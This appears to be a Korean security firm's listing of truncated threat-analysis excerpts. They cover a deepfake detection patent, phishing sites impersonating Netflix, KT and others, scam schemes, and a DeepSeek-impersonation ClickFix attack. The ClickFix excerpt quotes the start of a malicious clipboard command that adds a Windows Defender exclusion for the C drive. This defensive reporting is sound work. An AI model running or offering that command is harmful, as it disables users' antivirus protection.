이미지 픽셀 패턴 분석하는 기존 AI 기반 탐지 기술로 딥페이크 탐지 어려워AI와 메타데이터 분석 기술 결합한 누리랩 딥페이크 탐지 기술 탐지율 높아향후 AI 피싱 URL 탐지 솔루션 ‘AskURL’과 딥페이크 탐지 기술 결합한다는 계획 AI 보안 전문기업 누리랩이 인공지능(AI) 알고리즘과 메타데이터(metadata) 분석 기술을 결합한 딥페이크 탐지 기술에 대한 국내 특허를 출원했다고 12일 밝혔다. 이번 특허는 ‘딥페이크 생성물 탐지 방법 및 이를 수행하는 장치’에 대한 기술이다. AI 알고리즘만을 활용해 딥페이크를 탐지하는 기존 기술의 한계를 뛰어넘기 위해 메타데이터 분석을 결합한 것이 특징이다. 딥페이크는 AI 기술을 활용해 인간 이미지를 합성하는 기술이다. AI 기술의 비약적인 발전으로 일..

넷플릭스 가짜 로그인 페이지 생성해 이용자들 계정, 개인 신상 정보 탈취 시도넷플릭스 공식 사이트 비교하거나 공식 도메인 URL 확인 시 차이점 발견 가능누리랩의 AI 기반 안티 피싱 솔루션 ‘AskURL’ 활용해 사이트 검증 후 사용 제안 AI 보안 전문기업 누리랩이 넷플릭스 오리지널 시리즈인 ‘오징어 게임 시즌2’ 글로벌 공개를 틈타 넷플릭스 공식 사이트를 모방한 피싱 사이트가 급증하고 있어 이용자들의 각별한 주의가 필요하다고 30일 밝혔다. 누리랩에 따르면 넷플릭스 공식 사이트를 모방한 피싱 사이트의 대표적인 사기 유형은 가짜 로그인 페이지를 생성해 이용자들의 계정이나 개인 신상 정보 등을 탈취하는 유형이 많은 것으로 확인됐다. 탈취된 정보들은 계정 도용 또는 금융 사기 등의 악의적인 목적으로 사..

국내 대표 통신사 KT를 사칭한 피싱 사이트 발견공식 KT 웹사이트를 모방하여 유사하게 만든 가짜 웹사이트로 현혹피싱 사이트에서 사용자의 카드 결제 정보 입력 유도 후 탈취 1. 분석 개요 최근 국내 대표 통신사인 KT를 사칭한 피싱 사이트가 발견되고 있다.발견된 피싱 사이트는 KT의 높은 기업 신뢰도를 이용하여 사용자들을 속이는 스푸핑(spoofing) 기법이 활용되었다.피싱 사이트는 유명 기업 및 브랜드, 공신력 있는 공공기관, 금융사 등의 웹사이트를 모방하여 유사하게 만든 가짜 사이트로, 사용자들의 개인 신상 정보나 금융 거래 정보를 탈취하여 악의적인 목적으로 사용하고자 만들어진다. 대표적인 예로, 아이디와 비밀번호를 입력하도록 유도하는 가짜 로그인 페이지와 신용카드 정보나 은행 계좌 번호를 입..

1. 분석 개요 ​2025년 4월, 국내 유명 패션 브랜드 '빈폴(BEANPOLE)'를 사칭한 피싱 이메일이 다수 유포되고 있는 정황이 탐지되었다.탐지된 피싱 메일은 수신자에게 저작권 침해를 경고하는 공식 통지서로 위장된 사회공학적 공격 사례로 확인되었으며, 이메일 본문은 비교적 정제된 한국어로 작성되어 있었다. 하지만 일부 문장 구성에서 비자연스러운 표현과 비문이 포함되어 있어 정식 법무 통지서로 보기에는 어색함이 부분이 있었다. 특히 수신자에게 “저작권 침해 증거 확인”을 명목으로 압축파일(.zip) 형태의 첨부파일 링크 클릭을 유도하며, 해당 압축파일 내부에는 PDF로 위장된 실행파일(.exe)이 포함되어 있는 것으로 확인되었다. 이는 랜섬웨어 혹은 정보 탈취형 악성코드 유포를 목적으로 하는 전형..

1. 분석 개요​국내외 자동차 판매량이 꾸준히 증가함에 따라 이를 활용한 다양한 이벤트와 프로모션도 활발히 진행되고 있다.하지만 이러한 흐름을 악용해, 피싱 사이트들이 실제 응모 사이트처럼 정교하게 제작되어 이용자들의 개인정보를 탈취하는 사례가 발생하고 있다.이번 게시글에서는 이러한 피싱 사이트들이 정상적인 사이트와 얼마나 유사하게 구성되어 있는지, 그리고 어떻게 개인정보를 탈취하는지에 대해 자세히 살펴보고자 한다. 2. 피싱 사이트 분석 위 '그림1' 과 '그림 2'는 피싱 사이트와 공식 사이트의 화면을 비교해 보았다.두 사이트 모두 흰색 배경에, 주요 문구는 파란색 사각형 안에 흰색 글씨로 표기되어 있어 겉보기에는 매우 유사하게 보인다. 이러한 디자인 요소로 인해, 사용자들은 세심히 확인하지 않으..

1. 분석 개요​계절이 봄으로 바뀌며 날씨가 따뜻해진 요즘, 다수의 사람들이 여행을 가기 위해 숙박 시설을 예약한다. 그리고 이들 중 대부분은 편리하고 빠른 예약을 위해 온라인 숙박 예약 서비스를 활용한다. 하지만 이 점을 악용한 숙박 예약 서비스 사칭 사이트가 기승을 부리기 시작했는데, AskURL 서비스에서 이 피싱 공격을 탐지하였다. 본 글에서는 해당 피싱 사이트를 분석하며, 계정 정보가 탈취되는 과정을 설명하고자 한다. 2. 피싱 사이트 분석 위 그림은 피싱 사이트의 메인 페이지로 공식 사이트의 리소스를 가져와 만든 것으로 보인다. 그러나 일부 웹 리소스가 누락된 모습을 볼 수 있는데, 예를 들어 이미지가 있어야 할 공간이 여백이고, 메뉴나 특정 이벤트 홍보란을 클릭하면 반응이 없거나 404 E..

1. 분석 개요​트럼프 행정부의 관세정책 등으로 국제경제의 불확실성이 높아진 상황을 틈타 증권사 혹은 금융사를 사칭한 피싱 사이트가 급격히 증가하고 있어 투자자들의 각별한 주의가 요구된다. 이러한 피싱 사이트는 투자자의 불안 심리를 악용해 가짜 웹사이트 링크를 유포하거나 개인정보를 탈취하는 등 심각한 금융 피해를 유발할 수 있다. 이에 따라, 이번 게시글에서는 “신한투자증권” 피싱 사이트를 선정하여 해당 사이트가 가진 특징과 피싱 및 사기 수법, 개인정보 탈취 방법 등에 대해 기술할 예정이다. 2. 신한투자증권 피싱 사이트 컨텐츠 분석 해당 사이트 메인 화면 좌측 상단에는 실제 신한투자증권과 유사한 로고가 배치되어 있으며, 주요 메뉴로는 '해외송금'과 '외화 Buy & Sell'과 같은 서비스를 강조..

1. 분석 개요​최근 유튜브 쇼츠, 인스타 릴스 등에서 간단한 부업으로 돈을 벌 수 있다는 식의 홍보글을 심심치 않게 찾아볼 수 있다. 특히나 간단한 일을 하고도 하루에 많은 돈을 벌 수 있다는 식의 홍보글로 자신들의 웹사이트나 카카오톡 오픈채팅방으로 유도하고 있다. 이번 포스팅에서는 직접 채팅으로 대화하며 어떤 방식으로 금전적 피해를 입히는지에 대해 분석한 사기 방식을 서술한다. 2. 유도 방식​먼저 SNS의 숏폼 영상에서 홍보하는 부업 소개 게시글에서 부업 신청 사이트에 접속한다. 그리고 카카오톡 ID를 입력하고 기다리면 채팅을 받을 수 있다. 위와 같이 대화를 시작하면 사용자에 맞는 부업을 추천해주겠다며 선택지를 제시한다. 자세히 읽어보면 간단한 시청만으로 8000원까지 벌 수 있는 종목과 손으..

목 차 1. 감염 과정 2. 파일 정보 3. 도식도 4. yoda.exe 상세 분석 5. 악성코드 분석 요약 6. 결론 1. 감염 과정​▶ 피해자는 https://deepseek*******.top 등 DeepSeek 사칭 피싱 사이트에 접속하게 됩니다. ▶ 해당 피싱 사이트는 사용자를 속이기 위해 CAPTCHA 인증 페이지로 위장된 화면으로 유도합니다. ▶ 해당 피싱 사이트는 사용자가 특정 버튼이나 링크를 클릭할 경우, 클립보드에 악성 스크립트가 자동으로 복사되도록 설계되어 있습니다. (ClickFix 방식) ▶ 클립보드의 스크립트는 아래와 같습니다. cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell ..

1. 분석 개요​매년 봄이 다가오는 3월부터는 새 학기, 결혼식, 이사, 여행 등으로 사람들의 소통과 활동이 많아지기 시작한다. 그리고 이런 시기적 특성을 노리는 피싱 공격 또한 해마다 반복적으로 발생한다. 반복 발생하는 피싱 유형 중의 하나가 ‘경찰청 사칭 피싱·스미싱’이다. 경찰청 사칭 수법은 전형적이고 고착화된 피싱 수법이지만, 경찰의 연락은 일반적으로 긴장감을 유발하며 개인의 판단력까지 흐리게 한다. 올해도 이런 심리를 이용해 더욱 교묘해진 사기 수법으로 악성 어플리케이션(앱)을 설치/유도하는 피싱 사례가 증가하고 있다. 이에 이번 보고서를 통해 악성 앱 유포 경로 분석해 보고 피해를 예방해 보고자 한다. 2. 상세분석​● 피싱 사이트 유포 방식 해당 피싱 사기는 주로 휴대폰 문자 메시지(MMS..